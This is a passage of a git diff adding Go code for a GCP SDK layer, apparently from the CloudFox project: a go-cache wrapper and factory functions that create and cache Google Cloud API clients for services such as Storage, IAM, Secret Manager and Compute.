regions, err := GetGCPRegions() + if err != nil || len(regions) == 0 { + return CommonGCPRegions + } + return regions +} diff --git a/internal/gcp/sdk/cache.go b/internal/gcp/sdk/cache.go new file mode 100644 index 00000000..339525fa --- /dev/null +++ b/internal/gcp/sdk/cache.go @@ -0,0 +1,60 @@ +package sdk + +import ( + "strings" + "time" + + "github.com/patrickmn/go-cache" +) + +// GCPSDKCache is the centralized cache for all GCP SDK calls +// Uses the same caching library as AWS and Azure (github.com/patrickmn/go-cache) +// Default expiration: 2 hours, cleanup interval: 10 minutes +var GCPSDKCache = cache.New(2*time.Hour, 10*time.Minute) + +// CacheKey generates a consistent cache key from components +// Example: CacheKey("buckets", "my-project") -> "buckets-my-project" +func CacheKey(parts ...string) string { + return strings.Join(parts, "-") +} + +// ClearCache clears all entries from the cache +func ClearCache() { + GCPSDKCache.Flush() +} + +// CacheStats returns cache statistics +type CacheStats struct { + ItemCount int + Hits uint64 + Misses uint64 +} + +// GetCacheStats returns current cache statistics +func GetCacheStats() CacheStats { + return CacheStats{ + ItemCount: GCPSDKCache.ItemCount(), + // Note: go-cache doesn't track hits/misses directly + // These would need custom implementation if needed + } +} + +// SetCacheExpiration sets a custom expiration for an item +func SetCacheExpiration(key string, value interface{}, expiration time.Duration) { + GCPSDKCache.Set(key, value, expiration) +} + +// GetFromCache retrieves an item from cache +func GetFromCache(key string) (interface{}, bool) { + return GCPSDKCache.Get(key) +} + +// SetInCache stores an item in cache with default expiration +func SetInCache(key string, value interface{}) { + GCPSDKCache.Set(key, value, 0) // 0 = use default expiration +} + +// DeleteFromCache removes an item from cache +func DeleteFromCache(key string) { + GCPSDKCache.Delete(key) +} diff --git 
a/internal/gcp/sdk/clients.go b/internal/gcp/sdk/clients.go new file mode 100644 index 00000000..1a6c6780 --- /dev/null +++ b/internal/gcp/sdk/clients.go @@ -0,0 +1,1051 @@ +package sdk + +import ( + "context" + "fmt" + + // Go SDK clients (NewClient pattern) + "cloud.google.com/go/artifactregistry/apiv1" + "cloud.google.com/go/asset/apiv1" + "cloud.google.com/go/bigquery" + "cloud.google.com/go/pubsub" + "cloud.google.com/go/resourcemanager/apiv3" + secretmanagerclient "cloud.google.com/go/secretmanager/apiv1" + "cloud.google.com/go/storage" + + // REST API services (NewService pattern) + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" + apikeys "google.golang.org/api/apikeys/v2" + artifactregistryapi "google.golang.org/api/artifactregistry/v1" + beyondcorp "google.golang.org/api/beyondcorp/v1" + bigqueryapi "google.golang.org/api/bigquery/v2" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" + certificatemanager "google.golang.org/api/certificatemanager/v1" + cloudbuild "google.golang.org/api/cloudbuild/v1" + cloudfunctions "google.golang.org/api/cloudfunctions/v1" + cloudfunctionsv2 "google.golang.org/api/cloudfunctions/v2" + cloudidentity "google.golang.org/api/cloudidentity/v1" + cloudkms "google.golang.org/api/cloudkms/v1" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + cloudscheduler "google.golang.org/api/cloudscheduler/v1" + composer "google.golang.org/api/composer/v1" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + dataflow "google.golang.org/api/dataflow/v1b3" + dataproc "google.golang.org/api/dataproc/v1" + dns "google.golang.org/api/dns/v1" + file "google.golang.org/api/file/v1" + iam "google.golang.org/api/iam/v1" + iap "google.golang.org/api/iap/v1" + logging "google.golang.org/api/logging/v2" + notebooks "google.golang.org/api/notebooks/v1" + orgpolicy "google.golang.org/api/orgpolicy/v2" + 
pubsubapi "google.golang.org/api/pubsub/v1" + redis "google.golang.org/api/redis/v1" + run "google.golang.org/api/run/v1" + runv2 "google.golang.org/api/run/v2" + secretmanagerapi "google.golang.org/api/secretmanager/v1" + servicenetworking "google.golang.org/api/servicenetworking/v1" + sourcerepo "google.golang.org/api/sourcerepo/v1" + spanner "google.golang.org/api/spanner/v1" + sqladmin "google.golang.org/api/sqladmin/v1" + sqladminbeta "google.golang.org/api/sqladmin/v1beta4" + storageapi "google.golang.org/api/storage/v1" +) + +// ============================================================================= +// GO SDK CLIENTS (NewClient pattern) - These return *Client types +// ============================================================================= + +// GetStorageClient returns a Cloud Storage client (Go SDK) +func GetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + client, err := storage.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create storage client: %w", err) + } + return client, nil +} + +// GetSecretManagerClient returns a Secret Manager client (Go SDK) +func GetSecretManagerClient(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerclient.Client, error) { + client, err := secretmanagerclient.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create secret manager client: %w", err) + } + return client, nil +} + +// GetBigQueryClient returns a BigQuery client (Go SDK) +func GetBigQueryClient(ctx context.Context, session *gcpinternal.SafeSession, projectID string) (*bigquery.Client, error) { + client, err := bigquery.NewClient(ctx, projectID, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BigQuery client: %w", err) + } + return client, nil +} + +// GetPubSubClient returns a Pub/Sub client (Go SDK) +func GetPubSubClient(ctx context.Context, session 
*gcpinternal.SafeSession, projectID string) (*pubsub.Client, error) { + client, err := pubsub.NewClient(ctx, projectID, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Pub/Sub client: %w", err) + } + return client, nil +} + +// GetAssetClient returns a Cloud Asset client (Go SDK) +func GetAssetClient(ctx context.Context, session *gcpinternal.SafeSession) (*asset.Client, error) { + client, err := asset.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create asset client: %w", err) + } + return client, nil +} + +// GetArtifactRegistryClient returns an Artifact Registry client (Go SDK) +func GetArtifactRegistryClient(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Client, error) { + client, err := artifactregistry.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create artifact registry client: %w", err) + } + return client, nil +} + +// GetOrganizationsClient returns a Resource Manager Organizations client (Go SDK) +func GetOrganizationsClient(ctx context.Context, session *gcpinternal.SafeSession) (*resourcemanager.OrganizationsClient, error) { + client, err := resourcemanager.NewOrganizationsClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create organizations client: %w", err) + } + return client, nil +} + +// ============================================================================= +// REST API SERVICES (NewService pattern) - These return *Service types +// ============================================================================= + +// GetComputeService returns a Compute Engine service +func GetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + service, err := compute.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %w", err) + } + 
return service, nil +} + +// GetIAMService returns an IAM Admin service +func GetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + service, err := iam.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %w", err) + } + return service, nil +} + +// GetResourceManagerService returns a Cloud Resource Manager service (v1) +func GetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + service, err := cloudresourcemanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create resource manager service: %w", err) + } + return service, nil +} + +// GetSecretManagerService returns a Secret Manager service (REST API) +func GetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerapi.Service, error) { + service, err := secretmanagerapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create secret manager service: %w", err) + } + return service, nil +} + +// GetBigQueryService returns a BigQuery service (REST API v2) +func GetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigqueryapi.Service, error) { + service, err := bigqueryapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BigQuery service: %w", err) + } + return service, nil +} + +// GetStorageService returns a Cloud Storage service (REST API) +func GetStorageService(ctx context.Context, session *gcpinternal.SafeSession) (*storageapi.Service, error) { + service, err := storageapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create storage service: %w", err) + } + return service, nil +} + +// GetArtifactRegistryService returns an Artifact Registry service (REST API) +func 
GetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistryapi.Service, error) { + service, err := artifactregistryapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Artifact Registry service: %w", err) + } + return service, nil +} + +// GetContainerService returns a GKE Container service +func GetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { + service, err := container.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create container service: %w", err) + } + return service, nil +} + +// GetCloudRunService returns a Cloud Run service (v1) +func GetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) (*run.APIService, error) { + service, err := run.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run service: %w", err) + } + return service, nil +} + +// GetCloudRunServiceV2 returns a Cloud Run service (v2) +func GetCloudRunServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*runv2.Service, error) { + service, err := runv2.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run v2 service: %w", err) + } + return service, nil +} + +// GetCloudFunctionsService returns a Cloud Functions service (v1) +func GetCloudFunctionsService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctions.Service, error) { + service, err := cloudfunctions.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Functions service: %w", err) + } + return service, nil +} + +// GetCloudFunctionsServiceV2 returns a Cloud Functions v2 service +func GetCloudFunctionsServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctionsv2.Service, error) { + service, err := 
cloudfunctionsv2.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Functions v2 service: %w", err) + } + return service, nil +} + +// GetCloudIdentityService returns a Cloud Identity service +func GetCloudIdentityService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudidentity.Service, error) { + service, err := cloudidentity.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Identity service: %w", err) + } + return service, nil +} + +// GetAccessContextManagerService returns an Access Context Manager service +func GetAccessContextManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*accesscontextmanager.Service, error) { + service, err := accesscontextmanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Access Context Manager service: %w", err) + } + return service, nil +} + +// GetRedisService returns a Memorystore Redis service +func GetRedisService(ctx context.Context, session *gcpinternal.SafeSession) (*redis.Service, error) { + service, err := redis.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Redis service: %w", err) + } + return service, nil +} + +// GetServiceNetworkingService returns a Service Networking service +func GetServiceNetworkingService(ctx context.Context, session *gcpinternal.SafeSession) (*servicenetworking.APIService, error) { + service, err := servicenetworking.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Service Networking service: %w", err) + } + return service, nil +} + +// GetComposerService returns a Cloud Composer service +func GetComposerService(ctx context.Context, session *gcpinternal.SafeSession) (*composer.Service, error) { + service, err := composer.NewService(ctx, session.GetClientOption()) + if err != nil 
{ + return nil, fmt.Errorf("failed to create Composer service: %w", err) + } + return service, nil +} + +// GetDataflowService returns a Dataflow service +func GetDataflowService(ctx context.Context, session *gcpinternal.SafeSession) (*dataflow.Service, error) { + service, err := dataflow.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Dataflow service: %w", err) + } + return service, nil +} + +// GetDataprocService returns a Dataproc service +func GetDataprocService(ctx context.Context, session *gcpinternal.SafeSession) (*dataproc.Service, error) { + service, err := dataproc.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Dataproc service: %w", err) + } + return service, nil +} + +// GetNotebooksService returns a Notebooks service +func GetNotebooksService(ctx context.Context, session *gcpinternal.SafeSession) (*notebooks.Service, error) { + service, err := notebooks.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Notebooks service: %w", err) + } + return service, nil +} + +// GetBeyondCorpService returns a BeyondCorp service +func GetBeyondCorpService(ctx context.Context, session *gcpinternal.SafeSession) (*beyondcorp.Service, error) { + service, err := beyondcorp.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BeyondCorp service: %w", err) + } + return service, nil +} + +// GetIAPService returns an IAP service +func GetIAPService(ctx context.Context, session *gcpinternal.SafeSession) (*iap.Service, error) { + service, err := iap.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create IAP service: %w", err) + } + return service, nil +} + +// GetKMSService returns a Cloud KMS service +func GetKMSService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudkms.Service, error) { + service, 
err := cloudkms.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create KMS service: %w", err) + } + return service, nil +} + +// GetSQLAdminService returns a Cloud SQL Admin service (v1) +func GetSQLAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*sqladmin.Service, error) { + service, err := sqladmin.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create SQL Admin service: %w", err) + } + return service, nil +} + +// GetSQLAdminServiceBeta returns a Cloud SQL Admin service (v1beta4) +func GetSQLAdminServiceBeta(ctx context.Context, session *gcpinternal.SafeSession) (*sqladminbeta.Service, error) { + service, err := sqladminbeta.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create SQL Admin beta service: %w", err) + } + return service, nil +} + +// GetDNSService returns a Cloud DNS service +func GetDNSService(ctx context.Context, session *gcpinternal.SafeSession) (*dns.Service, error) { + service, err := dns.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create DNS service: %w", err) + } + return service, nil +} + +// GetPubSubService returns a Pub/Sub service (REST API) +func GetPubSubService(ctx context.Context, session *gcpinternal.SafeSession) (*pubsubapi.Service, error) { + service, err := pubsubapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Pub/Sub service: %w", err) + } + return service, nil +} + +// GetLoggingService returns a Cloud Logging service +func GetLoggingService(ctx context.Context, session *gcpinternal.SafeSession) (*logging.Service, error) { + service, err := logging.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Logging service: %w", err) + } + return service, nil +} + +// GetSpannerService returns a Cloud Spanner 
service +func GetSpannerService(ctx context.Context, session *gcpinternal.SafeSession) (*spanner.Service, error) { + service, err := spanner.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Spanner service: %w", err) + } + return service, nil +} + +// GetBigtableAdminService returns a Bigtable Admin service +func GetBigtableAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*bigtableadmin.Service, error) { + service, err := bigtableadmin.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Bigtable Admin service: %w", err) + } + return service, nil +} + +// GetFilestoreService returns a Filestore service +func GetFilestoreService(ctx context.Context, session *gcpinternal.SafeSession) (*file.Service, error) { + service, err := file.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Filestore service: %w", err) + } + return service, nil +} + +// GetSourceRepoService returns a Source Repositories service +func GetSourceRepoService(ctx context.Context, session *gcpinternal.SafeSession) (*sourcerepo.Service, error) { + service, err := sourcerepo.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Source Repositories service: %w", err) + } + return service, nil +} + +// GetCloudBuildService returns a Cloud Build service +func GetCloudBuildService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudbuild.Service, error) { + service, err := cloudbuild.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Build service: %w", err) + } + return service, nil +} + +// GetOrgPolicyService returns an Organization Policy service +func GetOrgPolicyService(ctx context.Context, session *gcpinternal.SafeSession) (*orgpolicy.Service, error) { + service, err := orgpolicy.NewService(ctx, 
session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Org Policy service: %w", err) + } + return service, nil +} + +// GetSchedulerService returns a Cloud Scheduler service +func GetSchedulerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudscheduler.Service, error) { + service, err := cloudscheduler.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Scheduler service: %w", err) + } + return service, nil +} + +// GetAPIKeysService returns an API Keys service +func GetAPIKeysService(ctx context.Context, session *gcpinternal.SafeSession) (*apikeys.Service, error) { + service, err := apikeys.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create API Keys service: %w", err) + } + return service, nil +} + +// GetCertificateManagerService returns a Certificate Manager service +func GetCertificateManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*certificatemanager.Service, error) { + service, err := certificatemanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Certificate Manager service: %w", err) + } + return service, nil +} + +// ============================================================================= +// CACHED CLIENT WRAPPERS - These cache clients for reuse +// ============================================================================= + +// CachedGetStorageClient returns a cached Storage client +func CachedGetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + cacheKey := CacheKey("client", "storage") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*storage.Client), nil + } + client, err := GetStorageClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetComputeService 
returns a cached Compute Engine service +func CachedGetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + cacheKey := CacheKey("client", "compute") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*compute.Service), nil + } + service, err := GetComputeService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetIAMService returns a cached IAM service +func CachedGetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + cacheKey := CacheKey("client", "iam") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*iam.Service), nil + } + service, err := GetIAMService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetResourceManagerService returns a cached Resource Manager service +func CachedGetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + cacheKey := CacheKey("client", "resourcemanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudresourcemanager.Service), nil + } + service, err := GetResourceManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSecretManagerService returns a cached Secret Manager service +func CachedGetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerapi.Service, error) { + cacheKey := CacheKey("client", "secretmanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*secretmanagerapi.Service), nil + } + service, err := GetSecretManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetBigQueryService 
returns a cached BigQuery service +func CachedGetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigqueryapi.Service, error) { + cacheKey := CacheKey("client", "bigquery") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*bigqueryapi.Service), nil + } + service, err := GetBigQueryService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetStorageService returns a cached Storage service (REST API) +func CachedGetStorageService(ctx context.Context, session *gcpinternal.SafeSession) (*storageapi.Service, error) { + cacheKey := CacheKey("client", "storage-api") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*storageapi.Service), nil + } + service, err := GetStorageService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetContainerService returns a cached GKE Container service +func CachedGetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { + cacheKey := CacheKey("client", "container") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*container.Service), nil + } + service, err := GetContainerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudRunService returns a cached Cloud Run service +func CachedGetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) (*run.APIService, error) { + cacheKey := CacheKey("client", "cloudrun") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*run.APIService), nil + } + service, err := GetCloudRunService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudFunctionsService returns a cached Cloud Functions 
service (v1) +func CachedGetCloudFunctionsService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctions.Service, error) { + cacheKey := CacheKey("client", "cloudfunctions") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudfunctions.Service), nil + } + service, err := GetCloudFunctionsService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudFunctionsServiceV2 returns a cached Cloud Functions v2 service +func CachedGetCloudFunctionsServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctionsv2.Service, error) { + cacheKey := CacheKey("client", "cloudfunctionsv2") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudfunctionsv2.Service), nil + } + service, err := GetCloudFunctionsServiceV2(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetDNSService returns a cached DNS service +func CachedGetDNSService(ctx context.Context, session *gcpinternal.SafeSession) (*dns.Service, error) { + cacheKey := CacheKey("client", "dns") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*dns.Service), nil + } + service, err := GetDNSService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetLoggingService returns a cached Logging service +func CachedGetLoggingService(ctx context.Context, session *gcpinternal.SafeSession) (*logging.Service, error) { + cacheKey := CacheKey("client", "logging") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*logging.Service), nil + } + service, err := GetLoggingService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetKMSService returns a cached KMS service +func 
CachedGetKMSService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudkms.Service, error) { + cacheKey := CacheKey("client", "kms") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudkms.Service), nil + } + service, err := GetKMSService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSQLAdminService returns a cached SQL Admin service (v1) +func CachedGetSQLAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*sqladmin.Service, error) { + cacheKey := CacheKey("client", "sqladmin") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*sqladmin.Service), nil + } + service, err := GetSQLAdminService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSQLAdminServiceBeta returns a cached SQL Admin service (v1beta4) +func CachedGetSQLAdminServiceBeta(ctx context.Context, session *gcpinternal.SafeSession) (*sqladminbeta.Service, error) { + cacheKey := CacheKey("client", "sqladminbeta") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*sqladminbeta.Service), nil + } + service, err := GetSQLAdminServiceBeta(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetPubSubService returns a cached PubSub service +func CachedGetPubSubService(ctx context.Context, session *gcpinternal.SafeSession) (*pubsubapi.Service, error) { + cacheKey := CacheKey("client", "pubsub") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*pubsubapi.Service), nil + } + service, err := GetPubSubService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudIdentityService returns a cached Cloud Identity service +func CachedGetCloudIdentityService(ctx 
context.Context, session *gcpinternal.SafeSession) (*cloudidentity.Service, error) { + cacheKey := CacheKey("client", "cloudidentity") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudidentity.Service), nil + } + service, err := GetCloudIdentityService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetAccessContextManagerService returns a cached Access Context Manager service +func CachedGetAccessContextManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*accesscontextmanager.Service, error) { + cacheKey := CacheKey("client", "accesscontextmanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*accesscontextmanager.Service), nil + } + service, err := GetAccessContextManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetRedisService returns a cached Redis service +func CachedGetRedisService(ctx context.Context, session *gcpinternal.SafeSession) (*redis.Service, error) { + cacheKey := CacheKey("client", "redis") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*redis.Service), nil + } + service, err := GetRedisService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSpannerService returns a cached Spanner service +func CachedGetSpannerService(ctx context.Context, session *gcpinternal.SafeSession) (*spanner.Service, error) { + cacheKey := CacheKey("client", "spanner") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*spanner.Service), nil + } + service, err := GetSpannerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetBigtableAdminService returns a cached Bigtable Admin service +func 
CachedGetBigtableAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*bigtableadmin.Service, error) { + cacheKey := CacheKey("client", "bigtableadmin") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*bigtableadmin.Service), nil + } + service, err := GetBigtableAdminService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetFilestoreService returns a cached Filestore service +func CachedGetFilestoreService(ctx context.Context, session *gcpinternal.SafeSession) (*file.Service, error) { + cacheKey := CacheKey("client", "filestore") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*file.Service), nil + } + service, err := GetFilestoreService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudBuildService returns a cached Cloud Build service +func CachedGetCloudBuildService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudbuild.Service, error) { + cacheKey := CacheKey("client", "cloudbuild") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudbuild.Service), nil + } + service, err := GetCloudBuildService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetComposerService returns a cached Composer service +func CachedGetComposerService(ctx context.Context, session *gcpinternal.SafeSession) (*composer.Service, error) { + cacheKey := CacheKey("client", "composer") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*composer.Service), nil + } + service, err := GetComposerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetDataflowService returns a cached Dataflow service +func CachedGetDataflowService(ctx 
context.Context, session *gcpinternal.SafeSession) (*dataflow.Service, error) { + cacheKey := CacheKey("client", "dataflow") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*dataflow.Service), nil + } + service, err := GetDataflowService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetDataprocService returns a cached Dataproc service +func CachedGetDataprocService(ctx context.Context, session *gcpinternal.SafeSession) (*dataproc.Service, error) { + cacheKey := CacheKey("client", "dataproc") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*dataproc.Service), nil + } + service, err := GetDataprocService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetNotebooksService returns a cached Notebooks service +func CachedGetNotebooksService(ctx context.Context, session *gcpinternal.SafeSession) (*notebooks.Service, error) { + cacheKey := CacheKey("client", "notebooks") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*notebooks.Service), nil + } + service, err := GetNotebooksService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSchedulerService returns a cached Scheduler service +func CachedGetSchedulerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudscheduler.Service, error) { + cacheKey := CacheKey("client", "scheduler") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudscheduler.Service), nil + } + service, err := GetSchedulerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// 